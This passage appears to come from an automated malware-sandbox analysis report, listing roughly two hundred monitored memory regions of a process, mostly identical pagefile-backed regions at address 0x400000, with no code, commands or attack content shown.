region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4952 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4953 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4954 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4955 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4956 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4957 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4958 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4959 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4960 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4961 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4962 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4963 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4964 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4965 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4966 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4967 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4968 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4969 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4970 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4971 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4972 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4973 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4974 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4975 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4976 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4977 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4978 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4979 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4980 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4981 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4982 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4983 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4984 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4985 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4986 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4987 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4988 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4989 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4990 start_va = 0x460000 end_va = 0x47dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4991 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4992 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4993 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4994 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4995 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4996 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4997 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4998 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4999 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5000 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5001 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5002 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5003 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5004 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5005 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5006 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5007 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5008 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5009 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5010 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5011 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5012 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5013 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5014 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5015 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5016 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5017 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5018 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5019 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5020 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5021 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5022 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5023 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5024 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5025 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5026 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5027 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5028 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5029 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5030 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5031 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5032 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5033 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5034 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5035 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5036 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5037 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5038 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5039 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5040 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5041 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5042 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5043 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5044 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5045 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5046 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5047 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5048 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5049 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5050 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5051 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5052 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5053 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5054 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5055 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5056 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5057 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5058 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5059 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5060 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5061 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5062 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5063 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5064 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5065 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5066 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5067 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5068 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5069 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5070 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5071 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5072 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5073 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5074 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5075 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5076 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5077 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5078 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5079 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5080 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5081 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 5082 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5083 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5084 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5085 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5086 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5087 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5088 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5089 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5090 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5091 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5092 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5093 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5094 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5095 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5096 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5097 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5098 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5099 start_va = 0x460000 end_va = 0x47dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 5100 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5101 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5102 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5103 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5104 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5105 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5106 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5107 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5108 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5109 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5110 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5111 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5112 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5113 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5114 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5115 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5116 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5117 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5118 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5119 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5120 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5121 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5122 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5123 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5124 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5125 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5126 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5127 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5128 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5129 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5130 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5131 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5132 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5133 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5134 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5135 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5136 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5137 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5138 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5139 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5140 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5141 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 